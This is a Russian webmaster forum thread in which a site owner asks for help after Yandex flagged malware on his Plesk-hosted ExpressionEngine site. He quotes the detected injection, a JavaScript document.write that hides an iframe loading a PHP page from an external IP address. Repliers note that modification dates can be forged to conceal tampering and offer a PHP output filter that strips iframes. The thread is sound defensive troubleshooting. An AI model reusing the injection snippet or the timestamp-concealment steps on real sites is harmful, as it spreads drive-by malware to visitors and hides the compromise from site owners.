Вирус. динамическое изменением файлов.

12
k.d.r
На сайте с 06.07.2008
Offline
182
2086

Кто-то сталкивался с таким: впс плеск, арендован у рбк, на сайте есть фрейворк expression engine.

Сколько времени на сайте провожу ни разу не заметил никакого вируса. Захожу и получаю предупреждение от яндекса, мол вирус на сайте. Пошел в вебмастер - говорят вирус. Идут смотреть не нашел ничего. Пишу ему, они сказали:

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в js скрипте

вредоносный код следующего содержания:

document.write('<style>.x1vvy5fkyw { position:absolute; left:-1828px; top:-1060px} </style> <div class="x1vvy5fkyw"><iframe src="http://69.89.4.78/909a4fce9e610c7ad320e6942b37edf4/q.php" width="418" height="110"></iframe></div>')

посмотрел все файлы, не нашел ничего.

После переписки, сказали что возможно проблема в модулях веб-сервера, которые могут быть заражены либо иметь дырки, которые собственно и делают такие манипуляции с файлами. Что характерно, файлы изменяются, но дата изменения файла не меняется... Парадокс.

Сталкивался ли кто-то?

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#1

Дата изменения файла редактируется при наличии определенного доступа. То есть:

1) Получаем информацию о времени изменения файла

2) Изменяем файл

3) Ставим дату изменения ту, что была до этого.

Необязательно должно быть, то что отдается в браузер. Может при помощи echo base64_decode(); отдаваться вредоносный JS.

UPDATE:

Есть вариант, правда не сказать, что он ТРУшный:

1) В самом начале включаем буферизацию и назначаем колбэк функцию для обработки инфы из буфера перед отдачей.


ob_Start('fuckBadCode');

2) Создаем функцию fuckBadCode()


function fuckBadCode($content)
{
$PCRE = "|<iframe([^>]+)>([^>]*)</iframe>|is";
$trueContent = preg_replace($PCRE, '', $content);
return $trueContent;
}

В итоге мы из ХТМЛ кода удаляем вставку АйФрейма. Если интересно, можно удалить всё, начиная от docwrite и до закрывающей скобки.

Подпись))
K5
На сайте с 21.07.2010
Offline
209
#2

урл покажите...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
k.d.r
На сайте с 06.07.2008
Offline
182
#3

Милованов Ю.С, внутрь ничего не добавляется. заражаются именно js файлы... как там можно сделать функции вывода на пхп? никак. если я скачиваю файл и вижу что в нет вируса, то значит нет. Идет какое-то программное внедрение извне. В кроне ничего нет, вот и думаем сидим, либо дырка в плеске, либо где-то шел.

---------- Добавлено 12.03.2013 в 18:40 ----------

kgtu5, ввв.s!lvermed!a.ру ! - заменить на i

K5
На сайте с 21.07.2010
Offline
209
#4

Мобильную версию отключите, все равно там только 2 строчки и ссылка на дле-ньюс...

k.d.r
На сайте с 06.07.2008
Offline
182
#5

kgtu5, и чо? я спрашивал про мобильную версию что-то?

TF-Studio
На сайте с 17.08.2010
Offline
334
#6

айболитом пройдитесь.

дата изменения файла - вообще ни о чем не говорит, она просто подделывается.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
K5
На сайте с 21.07.2010
Offline
209
#7

Культура прет "и чо"...

Вот я с мобильника зашел, и чо...

k.d.r
На сайте с 06.07.2008
Offline
182
#8

kgtu5, причем тут культура-мультура, вы спросили адрес чтоб с мобильника посмотреть?

---------- Добавлено 12.03.2013 в 19:03 ----------

TF-Studio, айболит это что? Антивирус или ?

K5
На сайте с 21.07.2010
Offline
209
#9

Чем плох мобильник? Редиректы хорошо видно с него..

k.d.r
На сайте с 06.07.2008
Offline
182
#10
kgtu5:
Чем плох мобильник?

Что вы с мобильника увидели там такого интересного, чтобы решить проблему? И суть вообще в чем вашей просьбы?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий